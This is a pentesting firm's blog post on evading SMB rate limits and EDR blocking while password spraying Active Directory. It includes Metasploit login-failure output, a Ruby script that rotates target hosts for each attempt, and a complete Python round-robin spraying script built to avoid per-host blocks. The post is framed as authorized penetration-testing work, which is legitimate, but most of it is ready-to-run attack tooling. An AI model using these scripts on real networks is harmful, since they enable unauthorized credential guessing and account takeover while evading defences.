Avoiding SMB Rate Limits During Authentication Attacks

Avoiding SMB Rate Limits During Authentication Attacks

During a penetration test, it's not an uncommon practice for a penetration tester to launch a password attack against Active Directory. Many times this password attack uses a list of domain user accounts that were enumerated or even just a list of potential domain user accounts that were generated randomly. Many penetration testers will either perform just a single password attack or at least 2-3 attempts, depending on domain's password lockout policy is set to.

A few weeks ago, I was conducting an internal penetration test and noticed that my customer had recently implemented a new endpoint detection and response (EDR) solution that monitored for authentication attacks that targeted 445/tcp (SMB). I realized this after performing an attack using Metasploit and a list of usernames that I randomly generated. I had no idea what the naming convention was, so this username list was going to help me figure it out. Shortly after I started this password attack, this happened:

[*] 10.172.12.171:445     - 10.172.12.171:445 - Starting SMB login bruteforce    
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\aadams:Password1234!', 
[!] 10.172.12.171:445     - No active DB -- Credential data will not be saved!   
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\aalexander:Password1234!',      
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\aallen:Password1234!', 
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\aanderson:Password1234!',       
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abailey:Password1234!',
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abaker:Password1234!', 
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abarnes:Password1234!',
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abell:Password1234!',  
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abennett:Password1234!',        
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abrooks:Password1234!',
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\abrown:Password1234!', 

-snipped-

[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\agarcia:Password1234!',
[-] 10.172.12.171:445     - 10.172.12.171:445 - Failed: 'obfuscated_domain\agonzales:Password1234!',
[*] 10.172.12.171:445     - Error: 10.172.12.171: RubySMB::Error::CommunicationError An error occured reading from the Socket Connection reset by peer

After noticing this on a single host, I changed targets to another system and noticed the same thing. I actually noticed this same exact behavior on all of the systems that I targeted, including just regular workstations. After developing a new username list that just simply contained numbers 1-100, this is when I came to the conclusion that the password attack was being blocked after 29 consecutive login attempts. After these login attempts, the system would just simply block port 445/tcp for what appeared to be a random amount of seconds.

As opposed to trying to figure out a way to conduct a slower password attack, I just simply developed a quick script to randomize the IPs for each authentication attempt. Using a list of at least 100 IP addresses that were joined to the domain (both workstations and servers), this would ensure that I would only conduct one authentication attack per system per X amount of seconds. This also means that, using this list, you'd have to authenticate to all 100 IP addresses before rotating back to the first one. This would give you at least 30+ seconds and this was perfect for me.

I can't necessarily give this workaround method an official script name since it's pretty ghetto, but I figured I'd just share it with others who may run across the same thing. It's just a simple ruby script that takes a list of IPs (ips.txt)  and a list of usernames (usernames.txt) and creates a msf_resource.rc file that you can call from Within Metasploit using resource msf_resource.rc, provided that you're in the same directory as that file.

Here's the script:

#!/usr/bin/env ruby
usernames = File.open("usernames.txt").read.split("\n")
msf_commands = ["use auxiliary/scanner/smb/smb_login"]
msf_commands << "spool smb/msf/smb_login_pw_guess.txt"
msf_commands << "set SMBPass Winter2020!"
msf_commands << "set SMBDomain obfuscated_domain"
ips = File.open("ips.txt").read.split("\n")
secondary_ips = ips
usernames.each do |username|
	if secondary_ips.empty?
		secondary_ips = ips
	end
	msf_commands << "set RHOSTS #{secondary_ips[0]}"
	msf_commands << "set SMBUser #{username}"
	msf_commands << "run"
	secondary_ips.shift
end
File.open("msf_resource.rc", "w") {|f| f.write(msf_commands.join("\n"))}

To run the script, just simply give it execution permissions with chmod +x script_name_here.rb followed by executing it simply by typing: ./script.rb. As long as the usernames.txt and ips.txt files are in the same directory, it will create a msf_resource.rc file. From within Metasploit, navigate to the directory where the msf_resource.rc file is located and call it using resource msf_resource.rc. If you need to stop it, just hold ctrl+c and cross your fingers with your other hand, as I'm not sure there's an actual way to interrupt a resource file from running, except by suspending the process (with ctrl+z) and killing it.

Again, this is nothing super fancy – it's just a quick, ghetto workaround for conducting a password attack using Metasploit while randomizing IP addresses. At some point, I'd like to submit a pull request for the smb_login module for Metasploit with a new RandomizeIPs option, but only if I can find the time before a reader does the same thing. Hey, it gets the job done for now. :)

Alternatively, if you want something a bit more efficient and easier, you can leverage the following Python script written by another penetration tester, Connor Brewer, who also faced a similar situation during his penetration test not too long after mine:

#!/usr/bin/env python3
#Round Robin Password Spraying
#ruby script and poc by Alton Johnson
#python by Connor Brewer

from smb.SMBConnection import *
import sys

class round_robin:

	def __init__(self):
		return


	def check_creds(self, dom, uname, pwd, c_name, s_name, ip):
		#this function checks a single set of credntials against
		#the supplied target IP
		#currently only supports  port 445
		conn = SMBConnection(uname, pwd, c_name, ip, domain=dom, use_ntlm_v2=True, is_direct_tcp=True)

		conn.connect(ip, 445, timeout=3)
		try:
			#if we're unauthed, this will throw and exception
			x = conn.listShares()
			print(f"[+]{dom}/{uname}:{pwd}")
		except:
			return False
		return True


	def pwd_spray(self, u_file, ip_file, pwd, dom):
		#takes a list of usernames and ip addresses on the target domain
		#rotate through all IP addresses  to avoid being blocked on the  DC
		i_file = open(ip_file)
		ip_addrs = i_file.read().split("\n")
		u_names = open(u_file)
		user_names = u_names.read().split("\n")

		n_counter = 0
		for user in user_names:
			if (user == ""): continue #blankline, skip it

			#if we've hit the end of our ip list, go to the beginning
			if (n_counter > len(ip_addrs)):
				n_counter = 0

			#check creds on  the ip address.
			#192.168.0.1 is a random string value that doesn't matter.
			success = 0
			while (success != 1):
				try:
					self.check_creds(dom, user, pwd, "192.168.0.1", ip_addrs[n_counter], ip_addrs[n_counter])
					success = 1
				except:
					print(f"Failed on {ip_addrs[n_counter]}")
					#something went wrong. try a different host
					n_counter += 1
					if (n_counter >= len(ip_addrs)):
						n_counter = 0


			n_counter += 1

		i_file.close()
		return


checker = round_robin()

if (len(sys.argv) < 4):
	print(f"USAGE: python3 {sys.argv[0]}    ")
	print("SMB password  spraying across all hosts in ips.txt to  bypass DC blocks")
	sys.exit()

u_file = sys.argv[1]
i_file = sys.argv[2]
pwd = sys.argv[3]
dom = sys.argv[4]

checker.pwd_spray(u_file, i_file, pwd, dom)

You can run this script using the following arguments: ./script.py username_list.txt ip_list.txt <password> <domain>

Happy hunting!


About Vonahi Security
Vonahi Security is building the future of offensive cybersecurity consulting services through automation. We provide the world's first and only automated network penetration test platform that replicates full attack simulations with zero configuration. With over 30 years of combined industry experience in both offensive and defensive security operations, our team of certified consultants have experience working with a significant number of organizations, industries, networks, and technologies. Our service expertise includes Penetration Testing and Adversary Simulations. Vonahi Security is headquartered in Atlanta, GA. To learn more, visit www.vonahi.io

Stay Informed

  • Connect with us on Linkedin for Professional Security Tips
  • Like us on Facebook for Personal Security Tips
  • Follow us on Twitter for News & Threat Updates